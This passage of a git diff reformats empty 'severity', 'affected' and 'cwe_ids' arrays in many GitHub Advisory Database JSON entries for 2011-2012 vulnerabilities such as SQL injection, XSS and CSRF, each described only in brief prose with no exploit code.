"github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2hrv-x2vv-hm7r/GHSA-2hrv-x2vv-hm7r.json b/advisories/unreviewed/2022/05/GHSA-2hrv-x2vv-hm7r/GHSA-2hrv-x2vv-hm7r.json index 91ce06a3941..2f21455dc9b 100644 --- a/advisories/unreviewed/2022/05/GHSA-2hrv-x2vv-hm7r/GHSA-2hrv-x2vv-hm7r.json +++ b/advisories/unreviewed/2022/05/GHSA-2hrv-x2vv-hm7r/GHSA-2hrv-x2vv-hm7r.json @@ -7,12 +7,8 @@ "CVE-2011-5198" ], "details": "SQL injection vulnerability in search.php in Neturf eCommerce Shopping Cart allows remote attackers to execute arbitrary SQL commands via the SearchFor parameter. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2hwq-cc69-76h5/GHSA-2hwq-cc69-76h5.json b/advisories/unreviewed/2022/05/GHSA-2hwq-cc69-76h5/GHSA-2hwq-cc69-76h5.json index fc22900d712..017a550bf53 100644 --- a/advisories/unreviewed/2022/05/GHSA-2hwq-cc69-76h5/GHSA-2hwq-cc69-76h5.json +++ b/advisories/unreviewed/2022/05/GHSA-2hwq-cc69-76h5/GHSA-2hwq-cc69-76h5.json @@ -7,12 +7,8 @@ "CVE-2012-2185" ], "details": "IBM Maximo Asset Management 6.2 through 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote authenticated users to obtain sensitive information via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2j52-jv7p-x34h/GHSA-2j52-jv7p-x34h.json b/advisories/unreviewed/2022/05/GHSA-2j52-jv7p-x34h/GHSA-2j52-jv7p-x34h.json index 3f8388d85a3..266389eb495 100644 --- a/advisories/unreviewed/2022/05/GHSA-2j52-jv7p-x34h/GHSA-2j52-jv7p-x34h.json +++ b/advisories/unreviewed/2022/05/GHSA-2j52-jv7p-x34h/GHSA-2j52-jv7p-x34h.json @@ -7,12 +7,8 @@ "CVE-2012-1900" ], "details": "Cross-site request forgery (CSRF) vulnerability in admin/index.php in RazorCMS 1.2.1 and earlier allows remote attackers to hijack the authentication of administrators for requests that delete arbitrary web pages via a showcats action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2j7m-x4gh-v3m8/GHSA-2j7m-x4gh-v3m8.json b/advisories/unreviewed/2022/05/GHSA-2j7m-x4gh-v3m8/GHSA-2j7m-x4gh-v3m8.json index bd4e8b59d17..537507efef2 100644 --- a/advisories/unreviewed/2022/05/GHSA-2j7m-x4gh-v3m8/GHSA-2j7m-x4gh-v3m8.json +++ b/advisories/unreviewed/2022/05/GHSA-2j7m-x4gh-v3m8/GHSA-2j7m-x4gh-v3m8.json @@ -7,12 +7,8 @@ "CVE-2012-1617" ], "details": "Directory traversal vulnerability in combine.php in OSClass before 2.3.6 allows remote attackers to read and write arbitrary files via a .. (dot dot) in the type parameter. NOTE: this vulnerability can be leveraged to upload arbitrary files.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2jx2-275x-4xpq/GHSA-2jx2-275x-4xpq.json b/advisories/unreviewed/2022/05/GHSA-2jx2-275x-4xpq/GHSA-2jx2-275x-4xpq.json index b079d2c2b0b..d140683ec7c 100644 --- a/advisories/unreviewed/2022/05/GHSA-2jx2-275x-4xpq/GHSA-2jx2-275x-4xpq.json +++ b/advisories/unreviewed/2022/05/GHSA-2jx2-275x-4xpq/GHSA-2jx2-275x-4xpq.json @@ -7,12 +7,8 @@ "CVE-2011-5244" ], "details": "Multiple off-by-one errors in the (1) token and (2) linetoken functions in backend/dvi/mdvi-lib/afmparse.c in t1lib, as used in teTeX 3.0.x, GNOME evince, and possibly other products, allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a DVI file containing a crafted Adobe Font Metrics (AFM) file, different vulnerabilities than CVE-2010-2642 and CVE-2011-0433.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2m32-q4rj-65v2/GHSA-2m32-q4rj-65v2.json b/advisories/unreviewed/2022/05/GHSA-2m32-q4rj-65v2/GHSA-2m32-q4rj-65v2.json index b9aa2254322..16b32dfcd08 100644 --- a/advisories/unreviewed/2022/05/GHSA-2m32-q4rj-65v2/GHSA-2m32-q4rj-65v2.json +++ b/advisories/unreviewed/2022/05/GHSA-2m32-q4rj-65v2/GHSA-2m32-q4rj-65v2.json @@ -7,12 +7,8 @@ "CVE-2012-3722" ], "details": "The Sorenson codec in QuickTime in Apple Mac OS X before 10.7.5, and in CoreMedia in iOS before 6, accesses uninitialized memory locations, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted movie file with Sorenson encoding.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2mp5-w5jx-qmrm/GHSA-2mp5-w5jx-qmrm.json b/advisories/unreviewed/2022/05/GHSA-2mp5-w5jx-qmrm/GHSA-2mp5-w5jx-qmrm.json index 8b4565463b2..a0b136e2833 100644 --- a/advisories/unreviewed/2022/05/GHSA-2mp5-w5jx-qmrm/GHSA-2mp5-w5jx-qmrm.json +++ b/advisories/unreviewed/2022/05/GHSA-2mp5-w5jx-qmrm/GHSA-2mp5-w5jx-qmrm.json @@ -7,12 +7,8 @@ "CVE-2012-2205" ], "details": "Cross-site scripting (XSS) vulnerability in IBM Rational ClearQuest 7.1.x before 7.1.2.7 and 8.x before 8.0.0.3 allows remote authenticated users to inject arbitrary web script or HTML via a workspace query.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2mwh-q6h5-vx3r/GHSA-2mwh-q6h5-vx3r.json b/advisories/unreviewed/2022/05/GHSA-2mwh-q6h5-vx3r/GHSA-2mwh-q6h5-vx3r.json index dfd5c4d0103..059632510d5 100644 --- a/advisories/unreviewed/2022/05/GHSA-2mwh-q6h5-vx3r/GHSA-2mwh-q6h5-vx3r.json +++ b/advisories/unreviewed/2022/05/GHSA-2mwh-q6h5-vx3r/GHSA-2mwh-q6h5-vx3r.json @@ -7,12 +7,8 @@ "CVE-2012-0707" ], "details": "Cross-site scripting (XSS) vulnerability in IBM WebSphere Lombardi Edition 7.2 allows remote attackers to inject arbitrary web script or HTML via crafted text input to a coach that is configured with a document attachment control section.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2p5v-xc8c-c7f4/GHSA-2p5v-xc8c-c7f4.json b/advisories/unreviewed/2022/05/GHSA-2p5v-xc8c-c7f4/GHSA-2p5v-xc8c-c7f4.json index 6e70145ba71..73e180788b5 100644 --- a/advisories/unreviewed/2022/05/GHSA-2p5v-xc8c-c7f4/GHSA-2p5v-xc8c-c7f4.json +++ b/advisories/unreviewed/2022/05/GHSA-2p5v-xc8c-c7f4/GHSA-2p5v-xc8c-c7f4.json @@ -7,12 +7,8 @@ "CVE-2011-5217" ], "details": "Directory traversal vulnerability in the PXE Mtftp service in Hitachi JP1/ServerConductor/DeploymentManager before 08-55 Japanese and before 08-51 English allows remote attackers to read arbitrary files via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2qp4-532r-wmc3/GHSA-2qp4-532r-wmc3.json b/advisories/unreviewed/2022/05/GHSA-2qp4-532r-wmc3/GHSA-2qp4-532r-wmc3.json index 8bc20303df2..526fc8c0aeb 100644 --- a/advisories/unreviewed/2022/05/GHSA-2qp4-532r-wmc3/GHSA-2qp4-532r-wmc3.json +++ b/advisories/unreviewed/2022/05/GHSA-2qp4-532r-wmc3/GHSA-2qp4-532r-wmc3.json @@ -7,12 +7,8 @@ "CVE-2012-3799" ], "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in the Maestro module 7.x-1.x before 7.x-1.2 for Drupal allow remote attackers to hijack the authentication of administrators for requests that (1) change workflows or (2) insert cross-site scripting (XSS) sequences.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2qw3-j5gw-6h65/GHSA-2qw3-j5gw-6h65.json b/advisories/unreviewed/2022/05/GHSA-2qw3-j5gw-6h65/GHSA-2qw3-j5gw-6h65.json index 2c1fd8861fc..7395d84a308 100644 --- a/advisories/unreviewed/2022/05/GHSA-2qw3-j5gw-6h65/GHSA-2qw3-j5gw-6h65.json +++ b/advisories/unreviewed/2022/05/GHSA-2qw3-j5gw-6h65/GHSA-2qw3-j5gw-6h65.json @@ -7,12 +7,8 @@ "CVE-2012-4019" ], "details": "Cross-site scripting (XSS) vulnerability in tokyo_bbs.cgi in Come on Girls Interface (CGI) Tokyo BBS allows remote attackers to inject arbitrary web script or HTML via vectors related to the error page.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2r95-rww6-2858/GHSA-2r95-rww6-2858.json b/advisories/unreviewed/2022/05/GHSA-2r95-rww6-2858/GHSA-2r95-rww6-2858.json index 9aeae0c87a6..af7524412c5 100644 --- a/advisories/unreviewed/2022/05/GHSA-2r95-rww6-2858/GHSA-2r95-rww6-2858.json +++ b/advisories/unreviewed/2022/05/GHSA-2r95-rww6-2858/GHSA-2r95-rww6-2858.json @@ -7,12 +7,8 @@ "CVE-2012-1739" ], "details": "Unspecified vulnerability in the Oracle E-Business Intelligence component in Oracle E-Business Suite 11.5.10.2, 12.0.4, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote authenticated users to affect integrity via unknown vectors related to Financials Business Intelligence.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2rg9-gvg8-5qq3/GHSA-2rg9-gvg8-5qq3.json b/advisories/unreviewed/2022/05/GHSA-2rg9-gvg8-5qq3/GHSA-2rg9-gvg8-5qq3.json index 5ada3a64801..1932ae4b7f3 100644 --- a/advisories/unreviewed/2022/05/GHSA-2rg9-gvg8-5qq3/GHSA-2rg9-gvg8-5qq3.json +++ b/advisories/unreviewed/2022/05/GHSA-2rg9-gvg8-5qq3/GHSA-2rg9-gvg8-5qq3.json @@ -7,12 +7,8 @@ "CVE-2012-1052" ], "details": "Buffer overflow in IvanView 1.2.15 allows remote attackers to execute arbitrary code via a JPEG2000 (JP2) file with a crafted Quantization Default (QCD) marker segment.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2v6j-6m6r-28qj/GHSA-2v6j-6m6r-28qj.json b/advisories/unreviewed/2022/05/GHSA-2v6j-6m6r-28qj/GHSA-2v6j-6m6r-28qj.json index e1d7d9c0081..21dfaefbeef 100644 --- a/advisories/unreviewed/2022/05/GHSA-2v6j-6m6r-28qj/GHSA-2v6j-6m6r-28qj.json +++ b/advisories/unreviewed/2022/05/GHSA-2v6j-6m6r-28qj/GHSA-2v6j-6m6r-28qj.json @@ -7,12 +7,8 @@ "CVE-2012-0748" ], "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in unspecified services in IBM Rational Team Concert (RTC) 4.x before 4.0.0.1 allow remote attackers to hijack the authentication of arbitrary users for requests that modify work items.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2w93-5qhr-rvc6/GHSA-2w93-5qhr-rvc6.json b/advisories/unreviewed/2022/05/GHSA-2w93-5qhr-rvc6/GHSA-2w93-5qhr-rvc6.json index 9e19edb9207..975401cc1e7 100644 --- a/advisories/unreviewed/2022/05/GHSA-2w93-5qhr-rvc6/GHSA-2w93-5qhr-rvc6.json +++ b/advisories/unreviewed/2022/05/GHSA-2w93-5qhr-rvc6/GHSA-2w93-5qhr-rvc6.json @@ -7,12 +7,8 @@ "CVE-2012-1223" ], "details": "RabidHamster R2/Extreme 1.65 and earlier uses a small search space of values for the PIN number, which allows remote attackers to obtain the PIN number via a brute force attack.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2x92-4r6r-mrfw/GHSA-2x92-4r6r-mrfw.json b/advisories/unreviewed/2022/05/GHSA-2x92-4r6r-mrfw/GHSA-2x92-4r6r-mrfw.json index 16762391735..99e7b0a2dbc 100644 --- a/advisories/unreviewed/2022/05/GHSA-2x92-4r6r-mrfw/GHSA-2x92-4r6r-mrfw.json +++ b/advisories/unreviewed/2022/05/GHSA-2x92-4r6r-mrfw/GHSA-2x92-4r6r-mrfw.json @@ -7,12 +7,8 @@ "CVE-2012-2059" ], "details": "Cross-site scripting (XSS) vulnerability in the ticketyboo News Ticker module for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-2x9r-7w9v-hwjw/GHSA-2x9r-7w9v-hwjw.json b/advisories/unreviewed/2022/05/GHSA-2x9r-7w9v-hwjw/GHSA-2x9r-7w9v-hwjw.json index 4f091fc6d5f..34a2ace3137 100644 --- a/advisories/unreviewed/2022/05/GHSA-2x9r-7w9v-hwjw/GHSA-2x9r-7w9v-hwjw.json +++ b/advisories/unreviewed/2022/05/GHSA-2x9r-7w9v-hwjw/GHSA-2x9r-7w9v-hwjw.json @@ -7,12 +7,8 @@ "CVE-2011-5157" ], "details": "Untrusted search path vulnerability in Attachmate Reflection before 14.1 SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, a related issue to CVE-2011-0107. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-2xxp-627h-jh7j/GHSA-2xxp-627h-jh7j.json b/advisories/unreviewed/2022/05/GHSA-2xxp-627h-jh7j/GHSA-2xxp-627h-jh7j.json index 72075aab70a..a4be062a571 100644 --- a/advisories/unreviewed/2022/05/GHSA-2xxp-627h-jh7j/GHSA-2xxp-627h-jh7j.json +++ b/advisories/unreviewed/2022/05/GHSA-2xxp-627h-jh7j/GHSA-2xxp-627h-jh7j.json @@ -7,12 +7,8 @@ "CVE-2012-2511" ], "details": "The DiagTraceAtoms function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-3225-8fvw-978w/GHSA-3225-8fvw-978w.json b/advisories/unreviewed/2022/05/GHSA-3225-8fvw-978w/GHSA-3225-8fvw-978w.json index 644f325db61..40e338a5311 100644 --- a/advisories/unreviewed/2022/05/GHSA-3225-8fvw-978w/GHSA-3225-8fvw-978w.json +++ b/advisories/unreviewed/2022/05/GHSA-3225-8fvw-978w/GHSA-3225-8fvw-978w.json @@ -7,12 +7,8 @@ "CVE-2012-0700" ], "details": "The client in InfoSphere FastTrack 8.1 through 8.7 in IBM InfoSphere Information Server 8.1, 8.5 before FP3, and 8.7 does not properly store credentials, which allows local users to bypass intended access restrictions via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-322p-76c5-wqq3/GHSA-322p-76c5-wqq3.json b/advisories/unreviewed/2022/05/GHSA-322p-76c5-wqq3/GHSA-322p-76c5-wqq3.json index cea93730c47..5785991a40b 100644 --- a/advisories/unreviewed/2022/05/GHSA-322p-76c5-wqq3/GHSA-322p-76c5-wqq3.json +++ b/advisories/unreviewed/2022/05/GHSA-322p-76c5-wqq3/GHSA-322p-76c5-wqq3.json @@ -7,12 +7,8 @@ "CVE-2012-3816" ], "details": "WinRadius Server 2009 allows remote attackers to cause a denial of service (crash) via a long password in an Access-Request packet.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-323x-m6wx-9h98/GHSA-323x-m6wx-9h98.json b/advisories/unreviewed/2022/05/GHSA-323x-m6wx-9h98/GHSA-323x-m6wx-9h98.json index 7cbabdcb465..cc3a13eaff6 100644 --- a/advisories/unreviewed/2022/05/GHSA-323x-m6wx-9h98/GHSA-323x-m6wx-9h98.json +++ b/advisories/unreviewed/2022/05/GHSA-323x-m6wx-9h98/GHSA-323x-m6wx-9h98.json @@ -7,12 +7,8 @@ "CVE-2012-3112" ], "details": "Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect integrity via unknown vectors related to Solaris Management Console.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-32gw-r878-mrx5/GHSA-32gw-r878-mrx5.json b/advisories/unreviewed/2022/05/GHSA-32gw-r878-mrx5/GHSA-32gw-r878-mrx5.json index d4fc7ee4571..df00fdbeedd 100644 --- a/advisories/unreviewed/2022/05/GHSA-32gw-r878-mrx5/GHSA-32gw-r878-mrx5.json +++ b/advisories/unreviewed/2022/05/GHSA-32gw-r878-mrx5/GHSA-32gw-r878-mrx5.json @@ -7,12 +7,8 @@ "CVE-2012-1021" ], "details": "Cross-site scripting (XSS) vulnerability in admin/categories.php in 4images 1.7.10 allows remote attackers to inject arbitrary web script or HTML via the cat_parent_id parameter in an addcat action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-32vf-6q42-4r57/GHSA-32vf-6q42-4r57.json b/advisories/unreviewed/2022/05/GHSA-32vf-6q42-4r57/GHSA-32vf-6q42-4r57.json index 756a3745392..f42f80413f2 100644 --- a/advisories/unreviewed/2022/05/GHSA-32vf-6q42-4r57/GHSA-32vf-6q42-4r57.json +++ b/advisories/unreviewed/2022/05/GHSA-32vf-6q42-4r57/GHSA-32vf-6q42-4r57.json @@ -7,12 +7,8 @@ "CVE-2011-5229" ], "details": "SQL injection vulnerability in quickstart/profile/index.php in the Forum module in appRain CMF 0.1.5 allows remote attackers to execute arbitrary SQL commands via the PATH_INFO.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-332c-xwph-rhqj/GHSA-332c-xwph-rhqj.json b/advisories/unreviewed/2022/05/GHSA-332c-xwph-rhqj/GHSA-332c-xwph-rhqj.json index 2e73784eec4..fde48d82c0f 100644 --- a/advisories/unreviewed/2022/05/GHSA-332c-xwph-rhqj/GHSA-332c-xwph-rhqj.json +++ b/advisories/unreviewed/2022/05/GHSA-332c-xwph-rhqj/GHSA-332c-xwph-rhqj.json @@ -7,12 +7,8 @@ "CVE-2012-1429" ], "details": "The ELF file parser in Bitdefender 7.2, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, and nProtect Anti-Virus 2011-01-17.01 allows remote attackers to bypass malware detection via an ELF file with a ustar character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different ELF parser implementations.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-33gc-p3fc-rqq7/GHSA-33gc-p3fc-rqq7.json b/advisories/unreviewed/2022/05/GHSA-33gc-p3fc-rqq7/GHSA-33gc-p3fc-rqq7.json index b7ed9bfff24..8b44c700fc0 100644 --- a/advisories/unreviewed/2022/05/GHSA-33gc-p3fc-rqq7/GHSA-33gc-p3fc-rqq7.json +++ b/advisories/unreviewed/2022/05/GHSA-33gc-p3fc-rqq7/GHSA-33gc-p3fc-rqq7.json @@ -7,12 +7,8 @@ "CVE-2012-0989" ], "details": "Cross-site scripting (XSS) vulnerability in OneOrZero AIMS 2.8.0 Trial Edition build231211 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-33hq-r9r9-2w2h/GHSA-33hq-r9r9-2w2h.json b/advisories/unreviewed/2022/05/GHSA-33hq-r9r9-2w2h/GHSA-33hq-r9r9-2w2h.json index e146e250969..d79766303e3 100644 --- a/advisories/unreviewed/2022/05/GHSA-33hq-r9r9-2w2h/GHSA-33hq-r9r9-2w2h.json +++ b/advisories/unreviewed/2022/05/GHSA-33hq-r9r9-2w2h/GHSA-33hq-r9r9-2w2h.json @@ -7,12 +7,8 @@ "CVE-2012-2952" ], "details": "SQL injection vulnerability in add_ons.php in Jaow 2.4.5 and earlier allows remote attackers to execute arbitrary SQL commands via the add_ons parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-342p-mxjx-vxmw/GHSA-342p-mxjx-vxmw.json b/advisories/unreviewed/2022/05/GHSA-342p-mxjx-vxmw/GHSA-342p-mxjx-vxmw.json index 58400ccb918..84ff39c01c9 100644 --- a/advisories/unreviewed/2022/05/GHSA-342p-mxjx-vxmw/GHSA-342p-mxjx-vxmw.json +++ b/advisories/unreviewed/2022/05/GHSA-342p-mxjx-vxmw/GHSA-342p-mxjx-vxmw.json @@ -7,12 +7,8 @@ "CVE-2012-1737" ], "details": "Unspecified vulnerability in the Enterprise Manager for Oracle Database component in Oracle Database Server 11.1.0.7, 11.2.0.2, and 11.2.0.3, and Enterprise Manager Grid Control EM Base Platform 10.2.0.5, EM Base Platform 11.1.0.1, EM Plugin for DB 12.1.0.1, and EM Plugin for DB 12.1.0.2, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to DB Performance Advisories/UIs.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-347x-pmh7-x2qr/GHSA-347x-pmh7-x2qr.json b/advisories/unreviewed/2022/05/GHSA-347x-pmh7-x2qr/GHSA-347x-pmh7-x2qr.json index 5f9f3fa0fa5..e796c64cb41 100644 --- a/advisories/unreviewed/2022/05/GHSA-347x-pmh7-x2qr/GHSA-347x-pmh7-x2qr.json +++ b/advisories/unreviewed/2022/05/GHSA-347x-pmh7-x2qr/GHSA-347x-pmh7-x2qr.json @@ -7,12 +7,8 @@ "CVE-2011-5255" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in admin/login in X3 CMS 0.4.3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO, (2) username, or (3) password parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-34gv-vxwq-v84r/GHSA-34gv-vxwq-v84r.json b/advisories/unreviewed/2022/05/GHSA-34gv-vxwq-v84r/GHSA-34gv-vxwq-v84r.json index 5e9ed2530e7..3778a5e5ccc 100644 --- a/advisories/unreviewed/2022/05/GHSA-34gv-vxwq-v84r/GHSA-34gv-vxwq-v84r.json +++ b/advisories/unreviewed/2022/05/GHSA-34gv-vxwq-v84r/GHSA-34gv-vxwq-v84r.json @@ -7,12 +7,8 @@ "CVE-2012-0975" ], "details": "Cross-site scripting (XSS) vulnerability in misc.php in Image Hosting Script DPI 1.0, 1.3, and earlier allows remote attackers to inject arbitrary web script or HTML via the showseries parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-34gw-343r-pm56/GHSA-34gw-343r-pm56.json b/advisories/unreviewed/2022/05/GHSA-34gw-343r-pm56/GHSA-34gw-343r-pm56.json index 05fbb45b024..0e153f3183d 100644 --- a/advisories/unreviewed/2022/05/GHSA-34gw-343r-pm56/GHSA-34gw-343r-pm56.json +++ b/advisories/unreviewed/2022/05/GHSA-34gw-343r-pm56/GHSA-34gw-343r-pm56.json @@ -7,12 +7,8 @@ "CVE-2012-0742" ], "details": "IBM Tivoli Event Pump 4.2.2, when the LOG_REQUESTS and VALIDATE_SOAP_USERS options are enabled, places credentials into the AOPSCLOG (aka AOPLOG) data set, which allows local users to obtain sensitive information by reading the data.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-34mg-j6f6-fj36/GHSA-34mg-j6f6-fj36.json b/advisories/unreviewed/2022/05/GHSA-34mg-j6f6-fj36/GHSA-34mg-j6f6-fj36.json index ac3d2e5d0b5..ef7504b2183 100644 --- a/advisories/unreviewed/2022/05/GHSA-34mg-j6f6-fj36/GHSA-34mg-j6f6-fj36.json +++ b/advisories/unreviewed/2022/05/GHSA-34mg-j6f6-fj36/GHSA-34mg-j6f6-fj36.json @@ -7,12 +7,8 @@ "CVE-2012-1084" ], "details": "Cross-site scripting (XSS) vulnerability in the BE User Switch (beuserswitch) extension 0.0.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-359m-8qm5-gh2f/GHSA-359m-8qm5-gh2f.json b/advisories/unreviewed/2022/05/GHSA-359m-8qm5-gh2f/GHSA-359m-8qm5-gh2f.json index 211824ca1dc..3910be8645d 100644 --- a/advisories/unreviewed/2022/05/GHSA-359m-8qm5-gh2f/GHSA-359m-8qm5-gh2f.json +++ b/advisories/unreviewed/2022/05/GHSA-359m-8qm5-gh2f/GHSA-359m-8qm5-gh2f.json @@ -7,12 +7,8 @@ "CVE-2012-2167" ], "details": "The IBM XIV Storage System Gen3 before 11.1.0.a allows remote attackers to cause a denial of service (device outage) via TCP packets to unspecified ports.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-35cf-cqr4-fr2m/GHSA-35cf-cqr4-fr2m.json b/advisories/unreviewed/2022/05/GHSA-35cf-cqr4-fr2m/GHSA-35cf-cqr4-fr2m.json index ba5543fd817..20aa0260df3 100644 --- a/advisories/unreviewed/2022/05/GHSA-35cf-cqr4-fr2m/GHSA-35cf-cqr4-fr2m.json +++ b/advisories/unreviewed/2022/05/GHSA-35cf-cqr4-fr2m/GHSA-35cf-cqr4-fr2m.json @@ -7,12 +7,8 @@ "CVE-2011-5161" ], "details": "Unrestricted 